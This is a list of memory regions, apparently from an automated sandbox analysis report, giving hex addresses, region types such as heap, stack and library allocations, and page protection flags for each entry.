|
4CA9000
|
trusted library allocation
|
page read and write
|
||
|
21ADD620000
|
remote allocation
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
4C93000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ADDA49000
|
heap
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
266C0C44000
|
trusted library allocation
|
page read and write
|
||
|
8BC5000
|
heap
|
page read and write
|
||
|
21ADD620000
|
remote allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
1D1D895B000
|
heap
|
page read and write
|
||
|
5E49000
|
trusted library allocation
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB0F000
|
heap
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
266BF190000
|
heap
|
page execute and read and write
|
||
|
21ADD9DE000
|
heap
|
page read and write
|
||
|
8B74000
|
heap
|
page read and write
|
||
|
21ADDBB5000
|
heap
|
page read and write
|
||
|
21ADDBB9000
|
heap
|
page read and write
|
||
|
2FC9000
|
heap
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
266D76C0000
|
heap
|
page read and write
|
||
|
266D781D000
|
heap
|
page read and write
|
||
|
7A0E000
|
heap
|
page read and write
|
||
|
4C94000
|
trusted library allocation
|
page read and write
|
||
|
4E10000
|
heap
|
page read and write
|
||
|
8DA0000
|
direct allocation
|
page read and write
|
||
|
29C17FE000
|
stack
|
page read and write
|
||
|
21ADDB48000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
2FEB000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
266C03AF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
21ADBAEB000
|
heap
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
2C3E000
|
unkown
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
7CAD000
|
stack
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
BEEC000
|
direct allocation
|
page execute and read and write
|
||
|
21ADDB79000
|
heap
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
266BF631000
|
trusted library allocation
|
page read and write
|
||
|
FFEFABB000
|
stack
|
page read and write
|
||
|
21ADD9DE000
|
heap
|
page read and write
|
||
|
21ADDA47000
|
heap
|
page read and write
|
||
|
21ADDB01000
|
heap
|
page read and write
|
||
|
266BD5D6000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
33AD000
|
heap
|
page read and write
|
||
|
2CCC000
|
heap
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
266BD755000
|
heap
|
page read and write
|
||
|
21ADBC0A000
|
heap
|
page read and write
|
||
|
2A7D000
|
stack
|
page read and write
|
||
|
8D40000
|
trusted library allocation
|
page read and write
|
||
|
4C9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
AAEC000
|
direct allocation
|
page execute and read and write
|
||
|
266CF1C1000
|
trusted library allocation
|
page read and write
|
||
|
266D76D7000
|
heap
|
page execute and read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
266D7882000
|
heap
|
page read and write
|
||
|
31BF000
|
stack
|
page read and write
|
||
|
266BF9A3000
|
trusted library allocation
|
page read and write
|
||
|
4CF0000
|
heap
|
page readonly
|
||
|
21ADDBB8000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
266BF62F000
|
trusted library allocation
|
page read and write
|
||
|
29C1DFB000
|
stack
|
page read and write
|
||
|
2EF8000
|
stack
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
21ADBB4A000
|
heap
|
page read and write
|
||
|
7B6E000
|
stack
|
page read and write
|
||
|
266BD750000
|
heap
|
page read and write
|
||
|
266D7828000
|
heap
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB73000
|
heap
|
page read and write
|
||
|
21ADDB15000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
727E000
|
stack
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
266BD690000
|
heap
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CC0000
|
heap
|
page read and write
|
||
|
266C0F9A000
|
trusted library allocation
|
page read and write
|
||
|
FFEFA3E000
|
stack
|
page read and write
|
||
|
21ADDB49000
|
heap
|
page read and write
|
||
|
266D7600000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E01000
|
trusted library allocation
|
page read and write
|
||
|
21ADBBB9000
|
heap
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
2EBC000
|
stack
|
page read and write
|
||
|
21ADDB36000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
8757000
|
stack
|
page read and write
|
||
|
21ADDB0B000
|
heap
|
page read and write
|
||
|
21ADBBEB000
|
heap
|
page read and write
|
||
|
FFEF57E000
|
stack
|
page read and write
|
||
|
FFEF93F000
|
stack
|
page read and write
|
||
|
FFF050D000
|
stack
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
266BF225000
|
trusted library allocation
|
page read and write
|
||
|
5735000
|
trusted library allocation
|
page read and write
|
||
|
266D75E0000
|
heap
|
page execute and read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
266BF1A1000
|
trusted library allocation
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
21ADBAF0000
|
heap
|
page read and write
|
||
|
21ADBB20000
|
heap
|
page read and write
|
||
|
7FF848E0A000
|
trusted library allocation
|
page read and write
|
||
|
266C0605000
|
trusted library allocation
|
page read and write
|
||
|
783F000
|
stack
|
page read and write
|
||
|
21ADDA02000
|
heap
|
page read and write
|
||
|
21ADD9DC000
|
heap
|
page read and write
|
||
|
7AF8000
|
trusted library allocation
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
21ADD9FA000
|
heap
|
page read and write
|
||
|
21ADDC73000
|
heap
|
page read and write
|
||
|
266D76E0000
|
heap
|
page read and write
|
||
|
21ADDA4C000
|
heap
|
page read and write
|
||
|
266D752E000
|
heap
|
page read and write
|
||
|
21ADBB9A000
|
heap
|
page read and write
|
||
|
21ADDB11000
|
heap
|
page read and write
|
||
|
7FF848C54000
|
trusted library allocation
|
page read and write
|
||
|
86250FD000
|
stack
|
page read and write
|
||
|
21ADD9D4000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
266BF641000
|
trusted library allocation
|
page read and write
|
||
|
21ADBBBB000
|
heap
|
page read and write
|
||
|
266C10CD000
|
trusted library allocation
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
7979000
|
heap
|
page read and write
|
||
|
21ADBAC0000
|
heap
|
page read and write
|
||
|
8BAA000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
883E000
|
stack
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7960000
|
heap
|
page read and write
|
||
|
266D7804000
|
heap
|
page read and write
|
||
|
266BF804000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
4C80000
|
trusted library allocation
|
page read and write
|
||
|
1D1D8C40000
|
heap
|
page read and write
|
||
|
21ADBC10000
|
heap
|
page read and write
|
||
|
266BD6C0000
|
trusted library section
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
266BD6D0000
|
trusted library allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
1D1D8C45000
|
heap
|
page read and write
|
||
|
21ADDC20000
|
heap
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
266BD5B6000
|
heap
|
page read and write
|
||
|
21ADD9D7000
|
heap
|
page read and write
|
||
|
266D7590000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
FFEF47D000
|
stack
|
page read and write
|
||
|
FFEF9BE000
|
stack
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
7C6E000
|
stack
|
page read and write
|
||
|
21ADDC4F000
|
heap
|
page read and write
|
||
|
266C0A64000
|
trusted library allocation
|
page read and write
|
||
|
21ADDBA5000
|
heap
|
page read and write
|
||
|
21ADDB36000
|
heap
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
4D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848C53000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B50000
|
heap
|
page read and write
|
||
|
1D1D8C44000
|
heap
|
page read and write
|
||
|
21ADD9F2000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB81000
|
heap
|
page read and write
|
||
|
21ADDCA0000
|
heap
|
page read and write
|
||
|
21ADDB48000
|
heap
|
page read and write
|
||
|
21ADDB2E000
|
heap
|
page read and write
|
||
|
266CF496000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB4D000
|
heap
|
page read and write
|
||
|
266C0FBE000
|
trusted library allocation
|
page read and write
|
||
|
266BF625000
|
trusted library allocation
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
266D77E0000
|
heap
|
page read and write
|
||
|
33BB000
|
heap
|
page read and write
|
||
|
FFF058B000
|
stack
|
page read and write
|
||
|
7365000
|
heap
|
page execute and read and write
|
||
|
7FF848C5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D10000
|
heap
|
page execute and read and write
|
||
|
87FE000
|
stack
|
page read and write
|
||
|
21ADDB48000
|
heap
|
page read and write
|
||
|
266BD6F0000
|
trusted library allocation
|
page read and write
|
||
|
266C0FC2000
|
trusted library allocation
|
page read and write
|
||
|
21ADBBC4000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
8B5D000
|
heap
|
page read and write
|
||
|
21ADD620000
|
remote allocation
|
page read and write
|
||
|
5E21000
|
trusted library allocation
|
page read and write
|
||
|
7EFC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
266BF698000
|
trusted library allocation
|
page read and write
|
||
|
5737000
|
trusted library allocation
|
page read and write
|
||
|
8E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
33C6000
|
heap
|
page read and write
|
||
|
21ADD9EE000
|
heap
|
page read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
21ADBBFC000
|
heap
|
page read and write
|
||
|
7A2D000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
2F8F000
|
unkown
|
page read and write
|
||
|
8DB0000
|
direct allocation
|
page read and write
|
||
|
266BD695000
|
heap
|
page read and write
|
||
|
5E85000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB1B000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
1D1D8B20000
|
heap
|
page read and write
|
||
|
733F000
|
stack
|
page read and write
|
||
|
21ADDBB8000
|
heap
|
page read and write
|
||
|
7FF848D0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
21ADDB92000
|
heap
|
page read and write
|
||
|
21ADDB8E000
|
heap
|
page read and write
|
||
|
332D000
|
heap
|
page read and write
|
||
|
7360000
|
heap
|
page execute and read and write
|
||
|
4E21000
|
trusted library allocation
|
page read and write
|
||
|
21ADDC20000
|
heap
|
page read and write
|
||
|
21ADBC10000
|
heap
|
page read and write
|
||
|
21ADDBBF000
|
heap
|
page read and write
|
||
|
21ADBAEC000
|
heap
|
page read and write
|
||
|
266BF9AF000
|
trusted library allocation
|
page read and write
|
||
|
21ADBB47000
|
heap
|
page read and write
|
||
|
8D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
88A0000
|
heap
|
page read and write
|
||
|
21ADBB48000
|
heap
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
266BF994000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
29C1CFD000
|
stack
|
page read and write
|
||
|
21ADDB1B000
|
heap
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
266BEF00000
|
trusted library allocation
|
page read and write
|
||
|
86252FF000
|
stack
|
page read and write
|
||
|
76C0000
|
heap
|
page read and write
|
||
|
21ADBBFC000
|
heap
|
page read and write
|
||
|
266CF1A1000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB36000
|
heap
|
page read and write
|
||
|
21ADDC4E000
|
heap
|
page read and write
|
||
|
266D7603000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB90000
|
heap
|
page read and write
|
||
|
266BEF30000
|
trusted library allocation
|
page read and write
|
||
|
21ADDBD0000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
7B20000
|
heap
|
page execute and read and write
|
||
|
266BD540000
|
heap
|
page read and write
|
||
|
21ADBC10000
|
heap
|
page read and write
|
||
|
21ADDBB5000
|
heap
|
page read and write
|
||
|
FFEF3FE000
|
stack
|
page read and write
|
||
|
21ADBBBB000
|
heap
|
page read and write
|
||
|
21ADD9D1000
|
heap
|
page read and write
|
||
|
21ADDB2E000
|
heap
|
page read and write
|
||
|
21ADDB0B000
|
heap
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
21ADBBFC000
|
heap
|
page read and write
|
||
|
21ADDB2E000
|
heap
|
page read and write
|
||
|
8D50000
|
trusted library allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
266BD710000
|
trusted library allocation
|
page read and write
|
||
|
21ADD9D1000
|
heap
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
21ADDAD1000
|
heap
|
page read and write
|
||
|
21ADDB07000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
266D759E000
|
heap
|
page read and write
|
||
|
21ADDB2E000
|
heap
|
page read and write
|
||
|
21ADDAF4000
|
heap
|
page read and write
|
||
|
4DA0000
|
heap
|
page read and write
|
||
|
4C60000
|
trusted library section
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
266BF041000
|
heap
|
page read and write
|
||
|
21ADDB79000
|
heap
|
page read and write
|
||
|
21ADDB2E000
|
heap
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
21ADD9F6000
|
heap
|
page read and write
|
||
|
266D76D0000
|
heap
|
page execute and read and write
|
||
|
4CB0000
|
trusted library allocation
|
page read and write
|
||
|
21ADBB82000
|
heap
|
page read and write
|
||
|
21ADD9D4000
|
heap
|
page read and write
|
||
|
21ADDB6E000
|
heap
|
page read and write
|
||
|
21ADD9E5000
|
heap
|
page read and write
|
||
|
266BD603000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ADBB75000
|
heap
|
page read and write
|
||
|
96EC000
|
direct allocation
|
page execute and read and write
|
||
|
77FE000
|
stack
|
page read and write
|
||
|
8850000
|
heap
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
266C0A68000
|
trusted library allocation
|
page read and write
|
||
|
29C21FB000
|
stack
|
page read and write
|
||
|
266BF3C8000
|
trusted library allocation
|
page read and write
|
||
|
9550000
|
direct allocation
|
page execute and read and write
|
||
|
4E18000
|
heap
|
page read and write
|
||
|
4F78000
|
trusted library allocation
|
page read and write
|
||
|
21ADBAEA000
|
heap
|
page read and write
|
||
|
21ADBAB0000
|
heap
|
page read and write
|
||
|
21ADBBC4000
|
heap
|
page read and write
|
||
|
8760000
|
heap
|
page read and write
|
||
|
266BF63D000
|
trusted library allocation
|
page read and write
|
||
|
266D7806000
|
heap
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page read and write
|
||
|
72FE000
|
stack
|
page read and write
|
||
|
21ADDB48000
|
heap
|
page read and write
|
||
|
21ADDAD1000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
21ADDA05000
|
heap
|
page read and write
|
||
|
1D1D88E0000
|
heap
|
page read and write
|
||
|
FFEF5FE000
|
stack
|
page read and write
|
||
|
4CBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CE0000
|
trusted library allocation
|
page read and write
|
||
|
7A0A000
|
heap
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page read and write
|
||
|
4E0C000
|
stack
|
page read and write
|
||
|
21ADDB36000
|
heap
|
page read and write
|
||
|
21ADD9F5000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
21ADDB0F000
|
heap
|
page read and write
|
||
|
21ADDBD1000
|
heap
|
page read and write
|
||
|
B4EC000
|
direct allocation
|
page execute and read and write
|
||
|
7FF848D06000
|
trusted library allocation
|
page read and write
|
||
|
21ADDA0E000
|
heap
|
page read and write
|
||
|
7FF848C6B000
|
trusted library allocation
|
page read and write
|
||
|
3362000
|
heap
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
21ADDB48000
|
heap
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB48000
|
heap
|
page read and write
|
||
|
266D74E0000
|
heap
|
page read and write
|
||
|
21ADD9DC000
|
heap
|
page read and write
|
||
|
266BD440000
|
heap
|
page read and write
|
||
|
21ADBB9D000
|
heap
|
page read and write
|
||
|
266BD520000
|
heap
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
21ADBBEB000
|
heap
|
page read and write
|
||
|
266D75BE000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
21ADBB49000
|
heap
|
page read and write
|
||
|
266BD570000
|
heap
|
page read and write
|
||
|
4CC2000
|
trusted library allocation
|
page read and write
|
||
|
266D7700000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
21ADDB1B000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
21ADBAE5000
|
heap
|
page read and write
|
||
|
266D7812000
|
heap
|
page read and write
|
||
|
29C1FFE000
|
stack
|
page read and write
|
||
|
266BD680000
|
trusted library section
|
page read and write
|
||
|
21ADDB7B000
|
heap
|
page read and write
|
||
|
86251FE000
|
unkown
|
page read and write
|
||
|
21ADDAE8000
|
heap
|
page read and write
|
||
|
266BD700000
|
heap
|
page readonly
|
||
|
21ADD9D1000
|
heap
|
page read and write
|
||
|
60C8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
21ADBBEB000
|
heap
|
page read and write
|
||
|
21ADBBB5000
|
heap
|
page read and write
|
||
|
8B32000
|
heap
|
page read and write
|
||
|
4C90000
|
trusted library allocation
|
page read and write
|
||
|
FFEF273000
|
stack
|
page read and write
|
||
|
21ADBC10000
|
heap
|
page read and write
|
||
|
21ADD9DC000
|
heap
|
page read and write
|
||
|
266BD57D000
|
heap
|
page read and write
|
||
|
266D7703000
|
heap
|
page read and write
|
||
|
5E31000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB2E000
|
heap
|
page read and write
|
||
|
21ADD9D7000
|
heap
|
page read and write
|
||
|
21ADDB4D000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
79C8000
|
heap
|
page read and write
|
||
|
21ADDBF5000
|
heap
|
page read and write
|
||
|
8D60000
|
trusted library allocation
|
page read and write
|
||
|
266C0FD3000
|
trusted library allocation
|
page read and write
|
||
|
266BF030000
|
heap
|
page read and write
|
||
|
21ADDB6F000
|
heap
|
page read and write
|
||
|
21ADDAF0000
|
heap
|
page read and write
|
||
|
A0EC000
|
direct allocation
|
page execute and read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
There are 495 hidden memdumps, click here to show them.